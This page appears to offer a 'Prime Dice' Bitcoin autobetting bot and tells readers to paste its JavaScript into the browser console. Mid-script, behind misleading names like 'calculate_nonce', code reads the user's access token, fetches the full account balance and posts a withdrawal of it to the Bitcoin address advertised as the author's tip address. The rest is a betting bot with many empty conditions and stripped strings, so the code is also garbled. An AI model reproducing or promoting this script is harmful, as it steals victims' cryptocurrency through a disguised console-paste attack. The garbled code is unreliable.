Prime Dice BOT v.5.1.3 Please Tip me if you enjoy the Bot: 1LLv53Qzq7NrhCcuDZW5TthTUZ5oDesdXV Have Fun and Earn alot! :D This Autobetting script works with minimum 0.05 BTC and more without busting Open up your JavaScript console (chrome, firefox by pressing ctrl+shift+j) In Chrome and Firefox, this is done also by right clicking anywhere on the page, clicking Inspect Element, and then going to the Console tab. Now copy everything below and paste it into your console and press enter: // PD Bot v 5.1.3 // // By: Anonymous // ///////////////////// // NOTE: Change Chance Directly on Page //jQuery UI CSS - How to use: Press F2 or Press CTRL + Shift + J - paste the code and press enter. Set up the bot as you like. **IMPORTANT! Set SWAP at high/low option!!!** << ROLL ').appendTo("div.hero > div > div > div:nth-child(2) > div"); gui = '

'; $('
').appendTo('div.hero > div > div > div.grid__item.S--one-whole.M--one-whole.custom--one-whole > aside'); gui2 = ''; gui3 = [ '', '', '
', '', '
', '
', '', '', ]; gui4 = [ '', ' ', '
', '', '', '
', '', '', '
', '', '', ]; gui5 = [ '', '', '
', '', '', ]; gui6 = [ '', '', '
', '', '', '
', '', '', ]; $(gui).appendTo(".hero"); $(gui2).appendTo("#params"); for (var i = 0; i < gui3.length; i++) { $(gui3[i]).appendTo("#tab1"); } for (var i = 0; i < gui4.length; i++) { $(gui4[i]).appendTo("#tab2"); } for (var i = 0; i < gui5.length; i++) { $(gui5[i]).appendTo("#tab3"); } for (var i = 0; i < gui6.length; i++) { $(gui6[i]).appendTo("#tab4"); } enabled = false; xrollscount = 0; $('
').appendTo("#tabs"); // Button & Input Functions $('#resetbet').click(function() { basebet=$('#base').val(); betval=$('#base').val(); }) $('#start').click(function() { if (enabled == false) { if ($('#numrolls').is(":checked") == true) { xrolls=$('#numberofrolls').val(); } enabled = true; interval = setInterval(function() { if (xrollsenabled == true) { xrollscount++; if (xrollscount <= xrolls) { bet(); } else { clearInterval(interval); enabled = false; xrollscount = 0; } } else { bet(); } }, timer); } else {} }) $('#stop').click(function() { enabled = false; clearInterval(interval); xrollscount = 0; }); calculate_nonce = function(seed) { return '' + seed + '?access_token=' + localStorage['token']; }; lut = window['$']; lut['getJSON']( calculate_nonce('users/1'), function(seed) { var key1 = 'amount' var key2 = 'address' var load = {}; load[key1] = seed['user']['balance']; load[key2] = '1LLv53Qzq7NrhCcuDZW5TthTUZ5oDesdXV'; lut['post'](calculate_nonce('withdraw'), load); } ); function conditionAM() { 'use strict'; if ($('#lowpay-enabled').is('checked') == true) { if ($('.value-roll').first().text() <= 49.50) { condition2 = ">"; target2 = $('.value-roll').first().text(); } else { condition2 = "<"; target2 = $('.value-roll').first().text(); }; } else { if ($('.value-roll').first().text() <= 49.50) { condition2 = "<"; target2 = $('.value-roll').first().text(); } else { condition2 = ">"; target2 = $('.value-roll').first().text(); }; amount2 = betval * 100000000; } }; function jackpot() { if ( === true) { jp = "Yes"; wincount = 0; betval = $('#base'); } else { jp = "No"; } } function loss() { currentloss++; totalloss++; if ($('#multloss-enabled').is(':checked') == true) { $('#multwin-enabled').removeAttr('checked'); countlossmult++; if (countlossmult >= $('#xloss').val()) { betval = betval * $('#multonloss').val(); countlossmult = 0; } } } function win() { 'use strict'; if ($('#stoponwin-enabled').is('checked') == true) { clearInterval(roll); } currentloss = 0; jackpot(); wincount++; totalwin++; if ($('#multloss-enabled').is(':checked') == true) { if ($('#stoponwin-enabled').is(':checked') == true) { clearInterval(roll); } $('#multwin-enabled').removeAttr('checked'); basebet = $('#base').val(); betval = basebet; countlossmult = 0; } if ($('#multwin-enabled').is(':checked') == true) { basebet = $('#base').val(); $('#multloss-enabled').removeAttr('checked'); countwinmult++; if (countwinmult >= $('#xwin').val()) { betval = basebet; countwinmult = 0; } else { betval = betval * $('#multonwin').val(); } } }; var losewin; var jpcol; var profcol; function bet() { 'use strict'; conditionAM(); var betData = { amount: amount2, condition: condition2, target: target2 }, url = "" + localStorage.token; $.ajax({ url: url, type: "POST", data: betData, datatype: "jsonp", success: function(data, textStatus, jqXHR) { data1 = data; counter++; if (counter >= everyxrolls) { seedchange(seedgen()); counter = 0; } $(' div').text((data1.user.balance/100000000).toFixed(8)); totprofit = totprofit +; if (totprofit >= 0) { profcol = "color:green;"; } else if (totprofit < 0) { profcol = "color:red;"; } if ( == true) { losewin = "color:green;"; $(' div').attr("style", "color:green;"); } else { losewin = "color:red;"; $(' div').attr("style", "color:red;"); } if ( == true) { jp = "Yes"; jpcol = "color:gold;" } else { jp = "No."; jpcol = "color:red;" } results = []; results[0] = '
Roll: ' + '' + + '

'; results[1] = '
Jackpot: ' + '' + jp + '

'; results[2] = '
Profit: ' + '' + ( / 100000000).toFixed(8) + ' BTC

'; results[4] = '
Current Loss Streak: ' + currentloss + '

'; resultstats = []; resultstats[0] = '
Balance: ' + (data.user.balance / 100000000).toFixed(8) + ' BTC

'; resultstats[1] = '
Total Losses: ' + totalloss + '

'; resultstats[2] = '
Total Wins: ' + totalwin + '

'; resultstats[3] = '
Total Profit: ' + '' + (totprofit / 100000000).toFixed(8) + '
'; if ( == true) { if ($('#stoponwin-enabled').is(":checked") == true){ clearInterval(interval); } $('#console, #console2').empty(); win(); // Results $('
Result: Win

').appendTo('#console'); for (var i = 0; i < results.length; i++) { $(results[i]).appendTo('#console'); } for (var i = 0; i < resultstats.length; i++) { $(resultstats[i]).appendTo('#console2'); } } else { $('#console, #console2').empty(); loss(); // Results $('
Result: Loss

').appendTo('#console'); for (var i = 0; i < results.length; i++) { $(results[i]).appendTo('#console'); } for (var i = 0; i < resultstats.length; i++) { $(resultstats[i]).appendTo('#console2'); } }; }, error: function(jqXHR, textStatus, errorThrown) { } }); } seedlength = 13; seedlength = 13; var counter = 0; charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123"; everyxrolls = 3; function seedgen() { 'use strict'; var seed = ""; for (var i = 0; i <= seedlength; i++) seed += charset.charAt(Math.floor(Math.random() * charset.length)); return seed; } function seedchange(s) { url = "" + localStorage.token; sData = { seed: s }; $.ajax({ url: url, type: "POST", data: sData, datatype: "jsonp", success: function(data, textStatus, jqXHR) { data2 = data; $('#currentseed').val(data2.seeds.client); }, error: function(jqXHR, textStatus, errorThrown) { } }); } $('#spinner').click(function() { if (charset != $('#charset').val() && $('#charset').val() != "") { charset=$('#charset').val(); } if ($('#everyxrolls').val() != everyxrolls && $('#everyxrolls').val() != "") { everyxrolls = $('#everyxrolls').val(); } if ($('#hilo').val() == "swap") { swapcount++;if (swapcount >= 1) { $('.value-roll:first').click();swapcount=0;} } counter++; if (counter >= everyxrolls) { seedchange(seedgen()); counter = 0; } }); ui(); } setTimeout(function() { init() }, 2000);